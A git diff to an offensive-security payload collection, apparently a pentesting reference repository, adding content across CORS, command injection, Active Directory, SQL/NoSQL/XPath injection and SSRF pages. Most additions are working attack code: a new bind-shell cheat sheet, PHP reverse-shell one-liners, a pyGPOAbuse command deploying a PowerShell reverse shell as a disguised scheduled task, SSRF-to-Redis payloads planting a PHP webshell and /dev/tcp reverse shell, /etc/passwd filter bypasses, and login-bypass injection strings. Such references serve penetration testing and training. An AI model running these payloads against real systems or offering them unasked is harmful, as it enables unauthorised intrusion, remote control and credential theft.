diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 1bbbc7e..138fb1c 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -4,10 +4,15 @@ ## Summary +* [Tools](#tools) * [Prerequisites](#prerequisites) * [Exploitation](#exploitation) * [References](#references) +## Tools + +* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3vCorsy/) + ## Prerequisites * BURP HEADER> `Origin: https://evil.com` diff --git a/Command Injection/README.md b/Command Injection/README.md index 8370522..ba3850f 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -111,8 +111,9 @@ something%0Acat%20/etc/passwd ### Bypass characters filter via hex encoding -linux -``` +Linux + +```powershell swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" /etc/passwd @@ -136,29 +137,22 @@ swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764) swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)` root:x:0:0:root:/root:/bin/bash - ``` ### Bypass characters filter Commands execution without backslash and slash - linux bash -``` +```powershell swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1} -/ swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd root:x:0:0:root:/root:/bin/bash swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1' -/ - swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< . -/ - swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd root:x:0:0:root:/root:/bin/bash - ``` ### Bypass Blacklisted words diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 12efdd6..7a97f84 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -427,7 +427,23 @@ SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContent SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" ``` -Abuse GPO with PowerView +Abuse GPO with **pyGPOAbuse** + +```powershell +git clone https://github.com/Hackndo/pyGPOAbuse +# Add john user to local administrators group (Password: H4x00r123..) +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" + +# Reverse shell example +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ + -powershell \ + -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ + -taskname "Completely Legit Task" \ + -description "Dis is legit, pliz no delete" \ + -user +``` + +Abuse GPO with **PowerView** ```powershell # Enumerate GPO diff --git a/Methodology and Resources/Bind Shell Cheatsheet.md b/Methodology and Resources/Bind Shell Cheatsheet.md new file mode 100644 index 0000000..73df69d --- /dev/null +++ b/Methodology and Resources/Bind Shell Cheatsheet.md @@ -0,0 +1,71 @@ +# Bind Shell + +## Summary + +* [Reverse Shell](#reverse-shell) + * [Perl](#perl) + * [Python](#python) + * [PHP](#php) + * [Ruby](#ruby) + * [Netcat Traditional](#netcat-traditional) + * [Netcat OpenBsd](#netcat-openbsd) + * [Ncat](#ncat) + * [Socat](#socat) + * [Powershell](#powershell) + + +## Perl + +```perl +perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\ +bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ +close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' +``` + +## PHP + +```php +php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\ +socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\ +$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\ + socket_write($cl,$m,strlen($m));}}' +``` + +## Ruby + +```ruby +ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)' +``` + +## Netcat Traditional + +```powershell +nc -nlvp 51337 -e /bin/bash +``` + +## Netcat OpenBsd + +```powershell +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f +``` + +## Socat + +```powershell +user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 +user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane +``` + +## Powershell + +```powershell +https://github.com/besimorhino/powercat + +# Victim (listen) +. .\powercat.ps1 +powercat -l -p 7002 -ep + +# Connect from attacker +. .\powercat.ps1 +powercat -c 127.0.0.1 -p 7002 +``` \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index f2fbcd6..78958b0 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -154,6 +154,9 @@ sshuttle -vvr username@pivot_host 10.2.2.0/24 # using a private key $ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" + +# -x == exclude some network to not transmit over the tunnel +# -x x.x.x.x.x/24 ``` ## chisel diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index a728c33..0362a8a 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -114,6 +114,11 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1 ```bash php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;' +php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");' ``` ```bash diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index 7c203b8..cebfe1b 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -27,8 +27,11 @@ Basic authentication bypass using not equal ($ne) or greater ($gt) ```json -in URL +in DATA username[$ne]=toto&password[$ne]=toto +login[$regex]=a.*&pass[$ne]=lol +login[$gt]=admin&login[$lt]=test&pass[$ne]=1 +login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto in JSON {"username": {"$ne": null}, "password": {"$ne": null}} diff --git a/SQL Injection/README.md b/SQL Injection/README.md index f3eeb33..353feca 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -31,6 +31,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) * [Authentication bypass](#authentication-bypass) + * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) @@ -365,7 +366,7 @@ admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ``` -## Authentication Bypass (Raw MD5) +## Authentication Bypass (Raw MD5 SHA1) When a raw md5 is used, the pass will be queried as a simple string, not a hexstring. @@ -377,6 +378,7 @@ Allowing an attacker to craft a string with a `true` statement such as `' or 'SO ```php md5("ffifdyop", true) = 'or'6�]��!r,��b +sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-! ``` Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index da3fcfa..964f300 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -31,6 +31,7 @@ * [gopher://](#gopher) * [netdoc://](#netdoc) * [SSRF exploiting WSGI](#ssrf-exploiting-wsgi) +* [SSRF exploiting Redis](#ssrf-exploiting-redis) * [SSRF to XSS](#ssrf-to-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) @@ -388,6 +389,24 @@ gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py | value data | (n bytes) | | /tmp/test.py | | +## SSRF exploiting Redis + +> Redis is a database system that stores everything in RAM + +```powershell +# Getting a webshell +url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html +url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php +url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>" +url=dict://127.0.0.1:6379/SAVE + +# Getting a PHP reverse shell +gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml +gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php +gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22 +gopher://127.0.0.1:6379/_save +``` + ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index bcbe72e..6e0ac6d 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -28,6 +28,9 @@ x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 +search=')] | //user/*[contains(*,' +search=Har') and contains(../password,'c +search=Har') and starts-with(../password,'c ``` ## Blind Exploitation